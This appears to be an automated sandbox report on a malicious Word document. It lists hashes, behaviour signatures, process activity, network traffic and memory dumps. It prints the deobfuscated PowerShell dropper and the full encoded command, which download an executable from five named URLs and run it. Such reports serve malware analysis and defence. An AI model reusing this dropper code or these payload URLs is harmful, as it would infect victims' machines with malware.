Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    119s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
  • submitted
    21/11/2024, 00:28 UTC

General

  • Target

    f1e1c0a73518f3ca584e90f162a224514a1a8a31d0b625f44e2c7ab878b715a0.doc

  • Size

    168KB

  • MD5

    75bd4b0063bd857bcab72e088adca30e

  • SHA1

    585a121ffbab437dd9043b87e2ace950842e5a06

  • SHA256

    f1e1c0a73518f3ca584e90f162a224514a1a8a31d0b625f44e2c7ab878b715a0

  • SHA512

    19b7666676481f8dd4edfd68f3b4b1df66536e6fd8e05ea5373c4375f00796dad8b2f8d1fa6d9ecb42bfacee8e0685b4845f937968fe32e9dd08d16e52cdd0ee

  • SSDEEP

    3072:64PrXcuQuvpzm4bkiaMQgAlS8ll4TKCpJynpr7RT:7DRv1m4bnQgIS8lFnpr7RT

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
1
$daohjouthwoiz = "heamhep"
2
[net.servicepointmanager]::securityprotocol = "tls12, tls11, tls"
3
$kiodmoag = "851"
4
$xaitxaugvaexroich = "veepboofpooqu"
5
$jeolwaiqujoud = $env:userprofile + "\\" + $kiodmoag + ".exe"
6
$geucthaudgurheud = "boojhiltheib"
7
$keupfaikthuus = new-object net.webclient
8
$maogzoegchuuk = "http://houseofgriffin.org/weblog/v76/", "http://hohwy.com/cgi-bin/Bv8y33Cmr/", "http://lidermuebles.com.ar/cgi-bin/wz4rxd/", "http://106.52.87.250:81/wp-admin/T3B09Z/", "http://duhocjk.vn/wp-admin/51f73u/"
9
$cuudbuahdiom = "wowtiavnual"
10
foreach ($boinleerxun in $maogzoegchuuk) {
11
try {
12
$keupfaikthuus.downloadfile($boinleerxun, $jeolwaiqujoud)
13
$duawquootchiaw = "kiaflaidlaek"
14
if ((get-item $jeolwaiqujoud).length -ge 33618) {
15
([wmiclass]"win32_Process").create($jeolwaiqujoud)
16
$haucjaixkoawfeuj = "keojxuc"
17
break
18
$wianmachtocdooj = "geemlihzeab"
19
}
20
} catch {
URLs
exe.dropper

http://houseofgriffin.org/weblog/v76/

exe.dropper

http://hohwy.com/cgi-bin/Bv8y33Cmr/

exe.dropper

http://lidermuebles.com.ar/cgi-bin/wz4rxd/

exe.dropper

http://106.52.87.250:81/wp-admin/T3B09Z/

exe.dropper

http://duhocjk.vn/wp-admin/51f73u/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 5 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Office loads VBA resources, possible macro or embedded object present
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\f1e1c0a73518f3ca584e90f162a224514a1a8a31d0b625f44e2c7ab878b715a0.doc"
    1⤵
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2572
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1668
    • C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe
      powersheLL -e JABkAGEAbwBoAGoAbwB1AHQAaAB3AG8AaQB6AD0AJwBoAGUAYQBtAGgAZQBwACcAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMARQBDAFUAcgBgAGkAVABZAFAAUgBgAG8AdABvAGMATwBsACIAIAA9ACAAJwB0AGwAcwAxADIALAAgAHQAbABzADEAMQAsACAAdABsAHMAJwA7ACQAawBpAG8AZABtAG8AYQBnACAAPQAgACcAOAA1ADEAJwA7ACQAeABhAGkAdAB4AGEAdQBnAHYAYQBlAHgAcgBvAGkAYwBoAD0AJwB2AGUAZQBwAGIAbwBvAGYAcABvAG8AcQB1ACcAOwAkAGoAZQBvAGwAdwBhAGkAcQB1AGoAbwB1AGQAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAGsAaQBvAGQAbQBvAGEAZwArACcALgBlAHgAZQAnADsAJABnAGUAdQBjAHQAaABhAHUAZABnAHUAcgBoAGUAdQBkAD0AJwBiAG8AbwBqAGgAaQBsAHQAaABlAGkAYgAnADsAJABrAGUAdQBwAGYAYQBpAGsAdABoAHUAdQBzAD0AJgAoACcAbgBlAHcALQAnACsAJwBvAGIAagBlACcAKwAnAGMAdAAnACkAIABuAEUAdAAuAFcAZQBCAEMAbABpAGUAbgBUADsAJABtAGEAbwBnAHoAbwBlAGcAYwBoAHUAdQBrAD0AJwBoAHQAdABwADoALwAvAGgAbwB1AHMAZQBvAGYAZwByAGkAZgBmAGkAbgAuAG8AcgBnAC8AdwBlAGIAbABvAGcALwB2ADcANgAvACoAaAB0AHQAcAA6AC8ALwBoAG8AaAB3AHkALgBjAG8AbQAvAGMAZwBpAC0AYgBpAG4ALwBCAHYAOAB5ADMAMwBDAG0AcgAvACoAaAB0AHQAcAA6AC8ALwBsAGkAZABlAHIAbQB1AGUAYgBsAGUAcwAuAGMAbwBtAC4AYQByAC8AYwBnAGkALQBiAGkAbgAvAHcAegA0AHIAeABkAC8AKgBoAHQAdABwADoALwAvADEAMAA2AC4ANQAyAC4AOAA3AC4AMgA1ADAAOgA4ADEALwB3AHAALQBhAGQAbQBpAG4ALwBUADMAQgAwADkAWgAvACoAaAB0AHQAcAA6AC8ALwBkAHUAaABvAGMAagBrAC4AdgBuAC8AdwBwAC0AYQBkAG0AaQBuAC8ANQAxAGYANwAzAHUALwAnAC4AIgBTAGAAcABMAGkAVAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAGMAdQB1AGQAYgB1AGEAaABkAGkAbwBtAD0AJwB3AG8AdwB0AGkAYQB2AG4AdQBhAGwAJwA7AGYAbwByAGUAYQBjAGgAKAAkAGIAbwBpAG4AbABlAGUAcgB4AHUAbgAgAGkAbgAgACQAbQBhAG8AZwB6AG8AZQBnAGMAaAB1AHUAawApAHsAdAByAHkAewAkAGsAZQB1AHAAZgBhAGkAawB0AGgAdQB1AHMALgAiAEQAbwBgAHcAbgBsAGAAbwBhAGAAZABGAEkATABFACIAKAAkAGIAbwBpAG4AbABlAGUAcgB4AHUAbgAsACAAJABqAGUAbwBsAHcAYQBpAHEAdQBqAG8AdQBkACkAOwAkAGQAdQBhAHcAcQB1AG8AbwB0AGMAaABpAGEAdwA9ACcAawBpAGEAZgBsAGEAaQBkAGwAYQBlAGsAJwA7AEkAZgAgACgAKAAuACgAJwBHACcAKwAnAGUAJwArACcAdAAtAEkAdABlAG0AJwApACAAJABqAGUAbwBsAHcAYQBpAHEAdQBqAG8AdQBkACkALgAiAEwAYABFAG4AZwB0AGgAIgAgAC0AZwBlACAAMwAzADYAMQA4ACkAIAB7ACgAWwB3AG0AaQBjAGwAYQBzAHMAXQAnAHcAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMAJwApAC4AIgBDAFIAZQBgAEEAdABlACIAKAAkAGoAZQBvAGwAdwBhAGkAcQB1AGoAbwB1AGQAKQA7ACQAaABhAHUAYwBqAGEAaQB4AGsAbwBhAHcAZgBlAHUAagA9ACcAawBlAG8AagB4AHUAYwAnADsAYgByAGUAYQBrADsAJAB3AGkAYQBuAG0AYQBjAGgAdABvAGMAZABvAG8AagA9ACcAZwBlAGUAbQBsAGkAaAB6AGUAYQBiACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAHEAdQBhAGIAcQB1AGEAaQBjAGgAcABhAHcAPQAnAGIAbwBlAHgAdgBlAGEAeAB4AGkAeQAnAA==
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2100

    Network

    • flag-us
      DNS
      houseofgriffin.org
      powersheLL.exe
      Remote address:
      8.8.8.8:53
      Request
      houseofgriffin.org
      IN A
      Response
      houseofgriffin.org
      IN A
      74.114.89.87
    • flag-us
      GET
      http://houseofgriffin.org/weblog/v76/
      powersheLL.exe
      Remote address:
      74.114.89.87:80
      Request
      GET /weblog/v76/ HTTP/1.1
      Host: houseofgriffin.org
      Connection: Keep-Alive
      Response
      HTTP/1.1 301 Moved Permanently
      Date: Thu, 21 Nov 2024 00:28:50 GMT
      Server: Apache
      Vary: Accept-Encoding,Cookie
      Expires: Wed, 11 Jan 1984 05:00:00 GMT
      Cache-Control: no-cache, must-revalidate, max-age=0
      X-Redirect-By: WordPress
      TT-Server: t=1732148930595180 D=24839
      Location: http://www.houseofgriffin.org/weblog/v76/
      Content-Length: 0
      Keep-Alive: timeout=10, max=20
      Connection: Keep-Alive
      Content-Type: text/html; charset=UTF-8
    • flag-us
      DNS
      www.houseofgriffin.org
      powersheLL.exe
      Remote address:
      8.8.8.8:53
      Request
      www.houseofgriffin.org
      IN A
      Response
      www.houseofgriffin.org
      IN A
      74.114.89.87
    • flag-us
      GET
      http://www.houseofgriffin.org/weblog/v76/
      powersheLL.exe
      Remote address:
      74.114.89.87:80
      Request
      GET /weblog/v76/ HTTP/1.1
      Host: www.houseofgriffin.org
      Connection: Keep-Alive
      Response
      HTTP/1.1 404 Not Found
      Date: Thu, 21 Nov 2024 00:28:51 GMT
      Server: Apache
      Vary: Accept-Encoding,Cookie
      Expires: Wed, 11 Jan 1984 05:00:00 GMT
      Cache-Control: no-cache, must-revalidate, max-age=0
      Link: <https://www.houseofgriffin.org/wp-json/>; rel="https://api.w.org/"
      TT-Server: t=1732148931019768 D=34652
      Keep-Alive: timeout=10, max=20
      Connection: Keep-Alive
      Transfer-Encoding: chunked
      Content-Type: text/html; charset=UTF-8
    • flag-us
      DNS
      hohwy.com
      powersheLL.exe
      Remote address:
      8.8.8.8:53
      Request
      hohwy.com
      IN A
      Response
      hohwy.com
      IN A
      81.169.145.77
    • flag-de
      GET
      http://hohwy.com/cgi-bin/Bv8y33Cmr/
      powersheLL.exe
      Remote address:
      81.169.145.77:80
      Request
      GET /cgi-bin/Bv8y33Cmr/ HTTP/1.1
      Host: hohwy.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 200 OK
      Date: Thu, 21 Nov 2024 00:28:51 GMT
      Server: Apache/2.4.62 (Unix)
      Vary: User-Agent
      Last-Modified: Wed, 27 Jul 2022 11:55:26 GMT
      ETag: "128a-5e4c817b6c780"
      Accept-Ranges: bytes
      Content-Length: 4746
      Keep-Alive: timeout=3, max=100
      Connection: Keep-Alive
      Content-Type: text/html
    • flag-us
      DNS
      lidermuebles.com.ar
      powersheLL.exe
      Remote address:
      8.8.8.8:53
      Request
      lidermuebles.com.ar
      IN A
      Response
      lidermuebles.com.ar
      IN A
      172.67.194.140
      lidermuebles.com.ar
      IN A
      104.21.92.141
    • flag-us
      GET
      http://lidermuebles.com.ar/cgi-bin/wz4rxd/
      powersheLL.exe
      Remote address:
      172.67.194.140:80
      Request
      GET /cgi-bin/wz4rxd/ HTTP/1.1
      Host: lidermuebles.com.ar
      Connection: Keep-Alive
      Response
      HTTP/1.1 301 Moved Permanently
      Date: Thu, 21 Nov 2024 00:28:51 GMT
      Content-Type: text/html
      Content-Length: 167
      Connection: keep-alive
      Cache-Control: max-age=3600
      Expires: Thu, 21 Nov 2024 01:28:51 GMT
      Location: https://lidermuebles.com.ar/cgi-bin/wz4rxd/
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FNYTa06kjEfMu9zGaJWYzEVf0m9tgVVwSDtukTnTrZbiJeCgbMisaJVmmxvX%2BooJS2%2BINYkWf1rd7C7XdZkg69RGhbNK%2FbSfXGe5onrwDaYf3FDIFlgdKDj2T8n%2FmcTdE%2BtIGcNQ"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 8e5c8fe70d12ef2b-LHR
      alt-svc: h3=":443"; ma=86400
      server-timing: cfL4;desc="?proto=TCP&rtt=39071&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=84&delivery_rate=0&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
    • flag-us
      GET
      https://lidermuebles.com.ar/cgi-bin/wz4rxd/
      powersheLL.exe
      Remote address:
      172.67.194.140:443
      Request
      GET /cgi-bin/wz4rxd/ HTTP/1.1
      Host: lidermuebles.com.ar
      Connection: Keep-Alive
      Response
      HTTP/1.1 302 Found
      Date: Thu, 21 Nov 2024 00:28:53 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Vary: Accept-Encoding,Cookie,User-Agent
      Expires: Wed, 11 Jan 1984 05:00:00 GMT
      Cache-Control: no-cache, must-revalidate, max-age=0
      Link: <https://lidermuebles.com.ar/wp-json/>; rel="https://api.w.org/"
      Location: https://lidermuebles.com.ar/
      CF-Cache-Status: DYNAMIC
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eM5ukKPeYbwsXc3AITazLVMVe5tXHQm7ilLiGX0N4Gn%2BLeznJLZx0AbqgrRVLAGJpXQme%2Bc8S9CYTVA%2FDpUoVUUBd7EceLcqQUssBOEsj9iYeIhSkBG6Me5bFRi5UW2R86gHN66l"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 8e5c8fea6df97777-LHR
      alt-svc: h3=":443"; ma=86400
      server-timing: cfL4;desc="?proto=TCP&rtt=51542&sent=6&recv=6&lost=0&retrans=0&sent_bytes=2866&recv_bytes=374&delivery_rate=81238&cwnd=253&unsent_bytes=0&cid=4a2e65ab43fe9ee0&ts=1699&x=0"
    • flag-us
      GET
      https://lidermuebles.com.ar/
      powersheLL.exe
      Remote address:
      172.67.194.140:443
      Request
      GET / HTTP/1.1
      Host: lidermuebles.com.ar
      Response
      HTTP/1.1 200 OK
      Date: Thu, 21 Nov 2024 00:28:54 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Vary: Accept-Encoding,Cookie,User-Agent
      Cache-Control: max-age=3, must-revalidate
      CF-Cache-Status: DYNAMIC
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=983aaw2hCtTxrrAL%2FYYVCPrIKWWcbvv%2FdMQ9%2FeRUgnHJhG7gqC4pAznES%2FnShXiDmX9Q%2F%2Bm3FiIKLq%2FRwmyttCf9c9OCeyjTa5aW2VcmZ5cWmkNygkVnO1gJXimj1VfOMc7Lg7jV"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 8e5c8ff43d6e7777-LHR
      alt-svc: h3=":443"; ma=86400
      server-timing: cfL4;desc="?proto=TCP&rtt=50158&sent=8&recv=7&lost=0&retrans=0&sent_bytes=3927&recv_bytes=459&delivery_rate=81238&cwnd=254&unsent_bytes=0&cid=4a2e65ab43fe9ee0&ts=1986&x=0"
    • 74.114.89.87:80
      http://houseofgriffin.org/weblog/v76/
      http
      powersheLL.exe
      309 B
      575 B
      5
      3

      HTTP Request

      GET http://houseofgriffin.org/weblog/v76/

      HTTP Response

      301
    • 74.114.89.87:80
      http://www.houseofgriffin.org/weblog/v76/
      http
      powersheLL.exe
      865 B
      33.4kB
      17
      26

      HTTP Request

      GET http://www.houseofgriffin.org/weblog/v76/

      HTTP Response

      404
    • 81.169.145.77:80
      http://hohwy.com/cgi-bin/Bv8y33Cmr/
      http
      powersheLL.exe
      353 B
      5.3kB
      6
      6

      HTTP Request

      GET http://hohwy.com/cgi-bin/Bv8y33Cmr/

      HTTP Response

      200
    • 172.67.194.140:80
      http://lidermuebles.com.ar/cgi-bin/wz4rxd/
      http
      powersheLL.exe
      314 B
      1.2kB
      5
      3

      HTTP Request

      GET http://lidermuebles.com.ar/cgi-bin/wz4rxd/

      HTTP Response

      301
    • 172.67.194.140:443
      https://lidermuebles.com.ar/
      tls, http
      powersheLL.exe
      2.1kB
      62.5kB
      35
      58

      HTTP Request

      GET https://lidermuebles.com.ar/cgi-bin/wz4rxd/

      HTTP Response

      302

      HTTP Request

      GET https://lidermuebles.com.ar/

      HTTP Response

      200
    • 8.8.8.8:53
      houseofgriffin.org
      dns
      powersheLL.exe
      64 B
      80 B
      1
      1

      DNS Request

      houseofgriffin.org

      DNS Response

      74.114.89.87

    • 8.8.8.8:53
      www.houseofgriffin.org
      dns
      powersheLL.exe
      68 B
      84 B
      1
      1

      DNS Request

      www.houseofgriffin.org

      DNS Response

      74.114.89.87

    • 8.8.8.8:53
      hohwy.com
      dns
      powersheLL.exe
      55 B
      71 B
      1
      1

      DNS Request

      hohwy.com

      DNS Response

      81.169.145.77

    • 8.8.8.8:53
      lidermuebles.com.ar
      dns
      powersheLL.exe
      65 B
      97 B
      1
      1

      DNS Request

      lidermuebles.com.ar

      DNS Response

      172.67.194.140
      104.21.92.141

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/2100-44-0x000000001B310000-0x000000001B5F2000-memory.dmp

      Filesize

      2.9MB

    • memory/2100-45-0x0000000001FC0000-0x0000000001FC8000-memory.dmp

      Filesize

      32KB

    • memory/2572-6-0x0000000000670000-0x0000000000770000-memory.dmp

      Filesize

      1024KB

    • memory/2572-38-0x0000000006380000-0x0000000006480000-memory.dmp

      Filesize

      1024KB

    • memory/2572-0-0x000000002F051000-0x000000002F052000-memory.dmp

      Filesize

      4KB

    • memory/2572-8-0x0000000006090000-0x0000000006190000-memory.dmp

      Filesize

      1024KB

    • memory/2572-14-0x0000000006380000-0x0000000006480000-memory.dmp

      Filesize

      1024KB

    • memory/2572-9-0x0000000000670000-0x0000000000770000-memory.dmp

      Filesize

      1024KB

    • memory/2572-23-0x0000000006380000-0x0000000006480000-memory.dmp

      Filesize

      1024KB

    • memory/2572-32-0x0000000006380000-0x0000000006480000-memory.dmp

      Filesize

      1024KB

    • memory/2572-37-0x0000000006380000-0x0000000006480000-memory.dmp

      Filesize

      1024KB

    • memory/2572-7-0x0000000000670000-0x0000000000770000-memory.dmp

      Filesize

      1024KB

    • memory/2572-2-0x000000007186D000-0x0000000071878000-memory.dmp

      Filesize

      44KB

    • memory/2572-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2572-46-0x000000007186D000-0x0000000071878000-memory.dmp

      Filesize

      44KB

    • memory/2572-47-0x0000000000670000-0x0000000000770000-memory.dmp

      Filesize

      1024KB

    • memory/2572-49-0x0000000006380000-0x0000000006480000-memory.dmp

      Filesize

      1024KB

    • memory/2572-50-0x0000000006380000-0x0000000006480000-memory.dmp

      Filesize

      1024KB

    • memory/2572-52-0x0000000006380000-0x0000000006480000-memory.dmp

      Filesize

      1024KB

    We care about your privacy.

    This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.